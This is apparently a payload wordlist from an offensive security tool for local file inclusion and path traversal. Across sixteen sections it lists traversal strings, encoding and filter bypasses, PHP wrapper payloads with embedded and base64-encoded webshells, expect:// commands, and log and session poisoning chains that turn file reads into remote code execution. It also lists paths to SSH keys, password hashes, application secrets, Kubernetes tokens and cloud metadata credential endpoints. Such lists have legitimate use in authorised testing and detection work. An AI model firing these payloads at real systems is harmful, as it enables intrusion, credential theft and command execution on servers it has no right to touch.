# ============================================================================
# HikariSystem Tsurugi - LFI/Path Traversal Research Module v3.0
# Focus: Path Traversal, Filter Bypass, Wrapper Exploitation, RCE Chains
# Last Updated: 2026-01-15 | Maintainer: ThreatBiih & LXrdKnowkill
# ============================================================================

# ============================================================================
# [SECTION 1] BASIC PATH TRAVERSAL (Linux)
# ============================================================================
# Standard directory traversal sequences for Linux systems.
# Target: /etc/passwd (readable by all), /etc/shadow (root only)

../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd

# Absolute Path (When traversal not needed)
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/issue
/etc/group
/etc/motd
/etc/resolv.conf

# ============================================================================
# [SECTION 2] BASIC PATH TRAVERSAL (Windows)
# ============================================================================
# Standard directory traversal for Windows systems.
# Target: win.ini (always exists), boot.ini (legacy), hosts file

..\windows\win.ini
..\..\windows\win.ini
..\..\..\windows\win.ini
..\..\..\..\windows\win.ini
..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\windows\win.ini

# Absolute Paths
C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
C:\boot.ini
C:\inetpub\logs\LogFiles
C:\inetpub\wwwroot\web.config

# Forward Slash (Works on Windows too)
C:/Windows/win.ini
C:/Windows/System32/drivers/etc/hosts
../../../../windows/win.ini
../../../../windows/system32/drivers/etc/hosts

# ============================================================================
# [SECTION 3] NULL BYTE INJECTION (Legacy PHP < 5.3.4)
# ============================================================================
# Truncates file extension appended by the application.
# Example: include($_GET['file'].'.php') -> bypass .php extension

../../../etc/passwd%00
../../../etc/passwd%00.php
../../../etc/passwd%00.jpg
../../../etc/passwd%00.html
../../../../etc/passwd%00
../../../../etc/passwd%00.php
../../../../etc/passwd%00.jpg
../../../../windows/win.ini%00
../../../../windows/win.ini%00.php

# URL Encoded Null
../../../etc/passwd%2500
../../../../etc/passwd%2500

# ============================================================================
# [SECTION 4] ENCODING BYPASS
# ============================================================================
# Evades regex-based filters by encoding traversal sequences.

# URL Encoding (Single)
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
..%252f..%252f..%252fetc%252fpasswd

# Double URL Encoding
..%252f..%252f..%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e/%252e%252e/etc/passwd

# Triple Encoding
..%25252f..%25252f..%25252fetc%25252fpasswd

# UTF-8 Encoding
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd

# Unicode Normalization
..%u2215..%u2215etc%u2215passwd
..%u2216..%u2216etc%u2216passwd

# Mixed Encoding
..%2f..%2f..%2f%65%74%63/%70%61%73%73%77%64
....//....//....//etc/passwd

# Backslash (Windows IIS)
..%5c..%5c..%5cwindows%5cwin.ini
..%255c..%255c..%255cwindows%255cwin.ini
..%c0%5c..%c0%5c..%c0%5cwindows%c0%5cwin.ini

# ============================================================================
# [SECTION 5] FILTER BYPASS TECHNIQUES
# ============================================================================
# For applications that filter specific patterns.

# Dot-Dot-Slash Variations
....//etc/passwd
....\/etc/passwd
..../\/etc/passwd
....\\etc\passwd
..../\etc/passwd

# When ../ is stripped (recursive stripping bypass)
....//....//....//etc/passwd
..../....//....//etc/passwd
....\/....\/....\/etc/passwd
....\\....\\....\\windows\\win.ini

# When ../ replaced with empty (double encoding)
....//....//....//etc/passwd
..../\..../\..../\etc/passwd

# Absolute Path When Traversal Blocked
/etc/passwd
/etc/shadow
/var/log/apache2/access.log

# Path Normalization Bypass
/etc/./passwd
/etc/../etc/passwd
/./etc/passwd
//etc//passwd
/etc/passwd/./
/var/www/html/../../../etc/passwd

# UNC Path (Windows)
\\localhost\c$\windows\win.ini
\\127.0.0.1\c$\windows\win.ini

# ============================================================================
# [SECTION 6] PHP WRAPPERS (Critical for RCE)
# ============================================================================
# PHP stream wrappers allow file read, base64 encode, and even RCE.

# php://filter - Read Source Code (Base64 Encoded)
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../config.php
php://filter/convert.base64-encode/resource=../../config.php
php://filter/read=convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=../../../etc/passwd

# php://filter - Alternative Encodings
php://filter/convert.iconv.utf-8.utf-16/resource=/etc/passwd
php://filter/convert.quoted-printable-encode/resource=/etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd

# php://filter - Chain for WAF Bypass
php://filter/convert.iconv.IBM1047.UTF8/resource=/etc/passwd
php://filter/convert.base64-encode|convert.base64-decode/resource=/etc/passwd

# php://input - RCE via POST Body
# POST body: <?php system($_GET['cmd']); ?>
php://input

# php://data - Embed Payload Directly
data://text/plain,<?php system('id'); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==

# expect:// - Direct Command Execution (If enabled)
expect://id
expect://whoami
expect://cat /etc/passwd

# phar:// - Deserialization Attack Vector
phar://uploads/evil.phar/test.txt
phar://./uploads/shell.jpg
phar:///var/www/html/uploads/evil.gif/test

# zip:// - Zip Extraction
zip://uploads/shell.zip#shell.php
zip://uploads/evil.jpg%23shell.php
zip:///var/www/html/uploads/shell.zip#cmd.php

# ============================================================================
# [SECTION 7] LOG POISONING (LFI to RCE)
# ============================================================================
# Inject PHP code into logs, then include the log file.

# Apache Access Log
/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/httpd/access_log
/var/log/httpd-access.log
/usr/local/apache/logs/access_log
/usr/local/apache2/logs/access_log
../../../var/log/apache2/access.log
../../../../var/log/apache2/access.log

# Apache Error Log
/var/log/apache2/error.log
/var/log/apache/error.log
/var/log/httpd/error_log
/var/log/httpd-error.log
../../../var/log/apache2/error.log

# Nginx Logs
/var/log/nginx/access.log
/var/log/nginx/error.log
../../../var/log/nginx/access.log
../../../var/log/nginx/error.log

# SSH Auth Logs
/var/log/auth.log
/var/log/secure
../../../var/log/auth.log

# Mail Logs
/var/log/mail.log
/var/spool/mail/www-data
/var/mail/www-data

# FTP Logs
/var/log/vsftpd.log
/var/log/proftpd/proftpd.log

# Proc Self Environ (CGI Environment)
/proc/self/environ
../../../proc/self/environ
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2

# ============================================================================
# [SECTION 8] SENSITIVE FILES (Linux)
# ============================================================================
# High-value targets for information disclosure.

# System Information
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/hostname
/etc/resolv.conf
/etc/issue
/etc/motd
/etc/os-release
/etc/lsb-release
/proc/version
/proc/cmdline
/proc/self/status
/proc/net/tcp
/proc/net/udp
/proc/mounts
/proc/self/cwd
/proc/self/exe

# SSH Keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/authorized_keys
/root/.ssh/known_hosts
/home/user/.ssh/id_rsa
/home/user/.ssh/authorized_keys
~/.ssh/id_rsa
~/.ssh/id_dsa
~/.ssh/id_ecdsa
~/.ssh/id_ed25519

# History Files
/root/.bash_history
/root/.mysql_history
/root/.nano_history
/home/user/.bash_history
~/.bash_history
~/.zsh_history

# Web Server Configuration
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/usr/local/apache2/conf/httpd.conf
/etc/httpd/conf/httpd.conf

# Application Configuration
/var/www/html/.env
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/configuration.php
/var/www/html/config/database.yml
/var/www/html/.git/config

# Database Files
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.frm

# Cron Jobs
/etc/crontab
/var/spool/cron/crontabs/root
/var/spool/cron/root

# ============================================================================
# [SECTION 9] SENSITIVE FILES (Windows)
# ============================================================================
# High-value Windows targets.

# System Files
C:\Windows\win.ini
C:\Windows\System.ini
C:\Windows\System32\drivers\etc\hosts
C:\boot.ini
C:\Windows\debug\NetSetup.log
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY

# IIS Configuration
C:\inetpub\wwwroot\web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
C:\Windows\System32\inetsrv\config\schema\ASPNET_schema.xml
C:\inetpub\logs\LogFiles\W3SVC1\u_exYYMMDD.log

# Application Files
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\php\php.ini
C:\xampp\mysql\data\mysql\user.MYD
C:\wamp\apache2\logs\access.log
C:\wamp\apache2\logs\error.log

# .NET Config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config

# ============================================================================
# [SECTION 10] PROC FILESYSTEM (Linux)
# ============================================================================
# /proc provides kernel and process information. Critical for recon.

# Self-referencing
/proc/self/environ
/proc/self/cmdline
/proc/self/status
/proc/self/cwd
/proc/self/exe
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/255
/proc/self/maps
/proc/self/mem
/proc/self/mounts
/proc/self/net/arp
/proc/self/net/tcp
/proc/self/net/udp

# System Info
/proc/version
/proc/cmdline
/proc/cpuinfo
/proc/meminfo
/proc/mounts
/proc/partitions
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/route

# Other Process FDs (If PID known)
/proc/1/cmdline
/proc/1/environ
/proc/1/fd/0

# ============================================================================
# [SECTION 11] CLOUD METADATA ENDPOINTS (SSRF -> LFI)
# ============================================================================
# If SSRF leads to file read, these expose cloud credentials.

# AWS
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/dynamic/instance-identity/document

# GCP
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token

# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/

# DigitalOcean
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1.json

# Oracle Cloud
http://169.254.169.254/opc/v1/instance/

# ============================================================================
# [SECTION 12] DOCKER/CONTAINER ESCAPE
# ============================================================================
# File paths relevant for container environment detection and potential escape.

# Docker Detection
/.dockerenv
/proc/1/cgroup
/proc/self/cgroup

# Docker Socket (Critical for escape)
/var/run/docker.sock
/run/docker.sock

# Kubernetes
/var/run/secrets/kubernetes.io/serviceaccount/token
/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
/var/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/token

# Environment Variables (often contain secrets)
/proc/self/environ
/proc/1/environ

# ============================================================================
# [SECTION 13] APPLICATION-SPECIFIC PATHS
# ============================================================================
# Common CMS and framework configuration files.

# WordPress
../../../../wp-config.php
../../../wp-config.php
../../wp-config.php
/var/www/html/wp-config.php

# Joomla
../../../../configuration.php
/var/www/html/configuration.php

# Drupal
../../../../sites/default/settings.php
/var/www/html/sites/default/settings.php

# Laravel
../../../../.env
../.env
../../.env
/var/www/html/.env
/var/www/html/storage/logs/laravel.log

# Symfony
../../../../app/config/parameters.yml
/var/www/html/app/config/parameters.yml

# Django
../../../../settings.py
../../../../myapp/settings.py

# Node.js
../../../../.env
../../../../config/default.json
../../../../package.json
/var/www/html/.env

# Ruby on Rails
../../../../config/database.yml
../../../../config/secrets.yml
../../../../config/master.key
/var/www/html/config/database.yml

# Git Repository
../../../../.git/config
../../../../.git/HEAD
../../../../.git/index
../../../../.git/logs/HEAD
.git/config
.git/HEAD

# ============================================================================
# [SECTION 14] JAVA/TOMCAT PATHS
# ============================================================================
# Java web application configuration files.

# Tomcat
/usr/local/tomcat/conf/tomcat-users.xml
/usr/local/tomcat/conf/server.xml
/usr/local/tomcat/conf/web.xml
/opt/tomcat/conf/tomcat-users.xml
/var/lib/tomcat/conf/tomcat-users.xml
/etc/tomcat/tomcat-users.xml
../../../../../usr/local/tomcat/conf/tomcat-users.xml

# Spring Boot
/application.properties
/application.yml
/var/www/html/WEB-INF/web.xml
../WEB-INF/web.xml
../../WEB-INF/web.xml
../../../WEB-INF/web.xml
WEB-INF/web.xml

# ============================================================================
# [SECTION 15] ADVANCED BYPASS CHAINS
# ============================================================================
# Complex bypass sequences for hardened environments.

# Double Traversal (When first ../ is stripped)
....//....//....//....//etc/passwd
....\/....\/....\/....\/etc/passwd
..../\..../\..../\..../\etc/passwd

# Path Truncation (Legacy)
/var/www/html/index.php/../../../etc/passwd
/../../../../../../../../../../../etc/passwd

# Mixed Traversal + Encoding
..%252f..%252f..%252f..%252fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd

# PHP Filter Chains (Oracle Padding Attack)
# These generate specific characters via filter chains
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.base64-decode/resource=php://temp

# ZIP Wrapper Chain
zip://shell.jpg%23cmd.php

# ============================================================================
# [SECTION 16] RCE CHAINS (LFI -> RCE)
# ============================================================================
# Methods to escalate LFI to Remote Code Execution.

# 1. Log Poisoning + LFI
# Step 1: Send request with User-Agent: <?php system($_GET['cmd']); ?>
# Step 2: Include log file
/var/log/apache2/access.log&cmd=id
../../../var/log/apache2/access.log&cmd=whoami

# 2. /proc/self/environ (CGI)
# Inject PHP in User-Agent, then include
/proc/self/environ

# 3. Session File Poisoning
# Inject PHP into session, then include session file
/tmp/sess_[PHPSESSID]
/var/lib/php/sessions/sess_[PHPSESSID]
../../../tmp/sess_[PHPSESSID]

# 4. php://input (POST data)
# Request body contains PHP code
php://input

# 5. PHP Wrapper with data://
data://text/plain,<?php passthru($_GET['cmd']); ?>
data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsgPz4=

# 6. expect:// (If enabled)
expect://id
expect://whoami

# 7. PHAR Deserialization
phar:///var/www/html/uploads/shell.gif/test.txt

# ============================================================================
# END OF RESEARCH MODULE
# Total Documented Vectors: ~200+ (Quality over Quantity)
# Each section targets specific exploitation contexts
# ============================================================================
